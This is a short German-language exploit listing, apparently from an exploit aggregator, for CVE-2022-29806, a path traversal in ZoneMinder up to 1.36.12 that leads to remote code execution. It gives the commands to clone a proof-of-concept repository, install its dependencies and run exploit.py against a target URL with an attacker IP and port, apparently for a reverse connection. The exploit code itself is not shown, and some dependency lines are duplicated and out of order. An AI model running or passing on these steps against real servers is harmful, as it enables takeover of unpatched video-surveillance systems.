
ZoneMinder bis 1.36.12 Language Privilege Escalation (und RCE) - Poc Exploit
ZoneMinder bis 1.36.12 Sprach-Privilegieneskalation (und RCE)

Eine Path Traversal-Schwachstelle in der Debug-Protokolldatei und der Standardsprachoption in ZoneMinder-Versionen vor 1.36.13 und 1.37.11 ermöglicht es Angreifern, beliebigen Code zu schreiben und auszuführen, um eine entfernte Befehlsausführung zu erreichen.
"Der Proof of Concept wurde gegen ZoneMinder 1.36.4 ubuntu18.04 Docker: ZoneMinder/zmdockerfiles getestet, ist aber bis zur neuesten Version 1.36.12 anwendbar."
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel hat die Schwachstelle entdeckt.